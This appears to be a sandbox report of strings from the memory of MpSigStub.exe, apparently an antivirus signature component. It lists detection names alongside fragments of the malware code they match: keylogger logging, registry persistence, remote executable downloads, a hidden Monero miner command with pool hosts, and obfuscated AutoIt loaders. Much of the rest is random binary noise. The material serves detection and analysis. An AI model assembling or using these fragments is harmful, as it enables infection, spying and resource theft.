    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#hstr:win32/autoitinject.s1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: enativ.com
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \enativ\4xnav12p.txt
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: = "http://download.enativ.com/nativ_v4.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#hstr:win32/predator.ar_0109!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: " & ".exe"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: = stringsplit ( tcuuq (
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alfper:clearlock!autoit
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: _blockinputex ( 3 , "[:alpha:]|[:number:]|{enter}|{backspace}
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \\software\microsoft\windows\currentversion\run
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: >func _logkeypress ( $what2log )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dreturn execute ( "stringtobinary($
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: := execute ( "dllstructcreate(
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: &while wingetprocess
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: if winclose =
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: & chr ( 92 ) & $
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ] = [ "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0.exe" , "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: `.exe" ]
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:hstr:autoit_rc4encodefunc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "performing backup only"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: runwait ( @comspec & " /c "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojan:win32/racealer.pa!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: inetget ( "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ://professorlog.xyz/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: .zip" , "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: = objcreate ( "shell.application" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: run ( "c:\users\public\run
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 4dllopen ( "advapi32.dll" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: func _crypt_encryptdata ( $
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: p = true )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dobjcreate ( "msxml2.domdocument" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0.datatype = "bin.base64"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: return seterror (
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: -dwv1.3.au3.509"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $"4054656d70446972"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "313232"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "3937"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 633323339323732393239272929"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#hstr:win32/predator.ar_3108!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: global $d3076 = execute
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dim $t31qy644 = $d3076 ( "chr" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:hstr:trojan:win32/startpage.zw!bit
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:ransom:win32/tron.pb!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $extension = "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: guicreate ( "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: _filecreate ( @appdatadir & "\network\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: filecopy ( "c:\programdata\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: " , "c:\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#allowlist:bonzo
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: autoit3wrapper_outfile=helpnew.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: autoit3wrapper_res_companyname=bonzo
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: autoit3wrapper_run_after=copy ""%out%"" ""c:\users\bonzo\temp"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: global $sservicename = "tvnserver"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: global $option_update = "http://bonzo.lublin.pl/help/helpnew.exe"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojan:win32/coinminer.pa!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: opt ( "trayiconhide" , 0 )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: -p x -k --nicehash -a rx/0 --max-cpu-usage=25" , "" , @sw_hide )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: run ( @comspec & " /c " & "%localappdata%\temp\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \webhelper.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0-o strat
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ://xmr.2miners.com
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ://randomxmonero.usa-east.nicehash.com
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojan:win32/autoitinject.sd!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: e_ju4
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: y&yxqc
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \(5,_!
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: b'cp/p
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ?.>7r
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: k~]pdzjso
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 'p2_s
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: rxhgruyd
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: &`\li
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: k~[rm
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [vywx?z
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: defxj
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: sl=v:
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: +*<~s
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #fkk(3
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \@|ux"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: gxctu
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: b&m;]
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: pbg,l
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: tpx;@=z
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: (-?s84
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: `ln"m
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: `ln"mm(
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: /<|rx
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: an['y
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: mbli_g3
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ep]m|
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: g{~</ba
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: b':'0
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dp|7^
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ]9;xo`
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: *'^ha
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: >hs;v1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: j.r` i
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 'wnf/
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ove7b
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: w.;ggq
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: nnu[%u
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: kq?"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: "](e`tz
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: b@sc6
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: x}hs`\
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: &jk2f
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: oaiub
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ,fn$|
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ba(p4
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [:hmw
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: }p[@&
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: bd~o4
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: n?5n`
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: s2!d2t
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: c!w"h
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ?+?7h
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #gtyf
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: c;v`%
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: y^>]j
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: z;d(4
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: +n7]0
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: qs[vr`
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ]wq8awl5
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ;>\.sl2
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: /fn,>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: wsnw
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: =#u(.
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: e@\z+)
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: @14aa+*
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: qu>w6
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 2g'h^
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: pp$b f
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: q*s5:s
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ,q2|9mj
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: +(w9q<f
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: m}m_=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: <,pas
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: j@>*b)
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: fcdo=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: :e34mi
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: qkq%g
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: -r-ma{#
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ;}djfm_
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: e) =g
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: a;6!n
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 0kprr
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: tws[zf
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: j)l*p
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: tz\ij$.
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: dhiwi%
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: i^(m=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 4~jfl
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 2c<se
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: i])h}t
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #(anz
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #ks|q
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: </ims1=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: *^fza9
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: b}sa[6
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 2_;)u
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: hzu3j
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: @;6y^
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: oya9&-
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: x\c'b
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: qzj"v
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: bw}v=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: 7vq7
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: =ij.f^
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ; _:p
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: :zq)pi
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: [ov(jm
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: ms2-r$
